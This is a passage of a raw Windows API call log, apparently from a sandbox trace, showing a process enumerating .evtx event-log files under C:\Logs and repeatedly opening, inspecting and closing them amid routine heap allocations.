InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfe0 [0086.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.771] AreFileApisANSI () returned 1 [0086.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0086.771] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0086.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a5b0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 60 [0086.771] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.771] GetFileType (hFile=0x348) returned 0x1 [0086.771] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0086.772] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.772] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.772] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.772] CloseHandle (hObject=0x348) returned 1 [0086.772] AreFileApisANSI () returned 1 [0086.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0086.772] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a430 [0086.772] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6a430, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 60 [0086.772] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.772] GetFileType (hFile=0x348) returned 0x1 [0086.772] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a430 | out: hHeap=0x20000) returned 1 [0086.773] CloseHandle (hObject=0x348) returned 1 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75f30 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75f30 | out: hHeap=0x20000) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.773] AreFileApisANSI () returned 1 [0086.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 60 [0086.773] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x69bb0 [0086.773] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x69bb0, cchWideChar=60 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx") returned 60 [0086.773] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-Hyper-V-Guest-Drivers%4Admin.evtx" (normalized: "c:\\logs\\microsoft-windows-hyper-v-guest-drivers%4admin.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x50b4bacf, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x50b4bacf, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69bb0 | out: hHeap=0x20000) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.773] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0086.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.774] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-International%4Operational.evtx", cAlternateFileName="MI854A~1.EVT")) returned 1 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69210 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45e88 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69210 | out: hHeap=0x20000) returned 1 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75eb8 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75eb8 | out: hHeap=0x20000) returned 1 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.774] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6eb58 [0086.774] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0086.774] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6eb58 | out: hHeap=0x20000) returned 1 [0086.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.775] AreFileApisANSI () returned 1 [0086.775] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx", lpUsedDefaultChar=0x0) returned 58 [0086.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0086.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.775] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0086.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0086.775] AreFileApisANSI () returned 1 [0086.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.775] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0086.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 58 [0086.775] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.775] GetFileType (hFile=0x348) returned 0x1 [0086.775] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.776] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0086.776] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0086.776] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0086.776] CloseHandle (hObject=0x348) returned 1 [0086.776] AreFileApisANSI () returned 1 [0086.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.776] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x69db0 [0086.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x69db0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 58 [0086.776] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.776] GetFileType (hFile=0x348) returned 0x1 [0086.776] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69db0 | out: hHeap=0x20000) returned 1 [0086.777] CloseHandle (hObject=0x348) returned 1 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75b70 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75b70 | out: hHeap=0x20000) returned 1 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76098 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75fa8 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75fa8 | out: hHeap=0x20000) returned 1 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76098 | out: hHeap=0x20000) returned 1 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75dc8 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75e40 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75dc8 | out: hHeap=0x20000) returned 1 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75e40 | out: hHeap=0x20000) returned 1 [0086.777] AreFileApisANSI () returned 1 [0086.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 58 [0086.777] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x74) returned 0x6a3b0 [0086.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x6a3b0, cchWideChar=58 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx") returned 58 [0086.777] GetFileAttributesExW (in: lpFileName="C:\\Logs\\Microsoft-Windows-International%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-international%4operational.evtx"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb66288f, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0xcb66288f, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0xd96d7ac9, ftLastWriteTime.dwHighDateTime=0x1d1a04f, nFileSizeHigh=0x0, nFileSizeLow=0x11000)) returned 1 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0086.777] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0086.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.778] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x506ad1ac, ftCreationTime.dwHighDateTime=0x1d1a04e, ftLastAccessTime.dwLowDateTime=0x506ad1ac, ftLastAccessTime.dwHighDateTime=0x1d1a04e, ftLastWriteTime.dwLowDateTime=0x95ae023d, ftLastWriteTime.dwHighDateTime=0x1d1a04e, nFileSizeHigh=0x0, nFileSizeLow=0x11000, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="Microsoft-Windows-Kernel-Boot%4Operational.evtx", cAlternateFileName="MI32CE~1.EVT")) returned 1 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x69350 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46ac8 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x69350 | out: hHeap=0x20000) returned 1 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71ca0 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x719c8 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46ac8 | out: hHeap=0x20000) returned 1 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d070 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d070 | out: hHeap=0x20000) returned 1 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d040 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d040 | out: hHeap=0x20000) returned 1 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71890 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b00 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75be8 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0086.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b00 | out: hHeap=0x20000) returned 1 [0086.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x75cd8 [0086.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75be8 | out: hHeap=0x20000) returned 1 [0086.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x75cd8 | out: hHeap=0x20000) returned 1 [0086.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71890 | out: hHeap=0x20000) returned 1 [0086.779] AreFileApisANSI () returned 1 [0086.779] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx", lpUsedDefaultChar=0x0) returned 56 [0086.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0086.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.779] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0086.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0086.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0086.779] AreFileApisANSI () returned 1 [0086.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 56 [0086.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76278 [0086.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53490, cbMultiByte=-1, lpWideCharStr=0x76278, cchWideChar=56 | out: lpWideCharStr="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx") returned 56 [0086.779] CreateFileW (lpFileName="C:\\Logs\\Microsoft-Windows-Kernel-Boot%4Operational.evtx" (normalized: "c:\\logs\\microsoft-windows-kernel-boot%4operational.evtx"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x348 [0086.779] GetFileType (hFile=0x348) returned 0x1 [0086.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76278 | out: hHeap=0x20000) returned 1 [0086.780] SetFilePointerEx (in: hFile=0x348, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 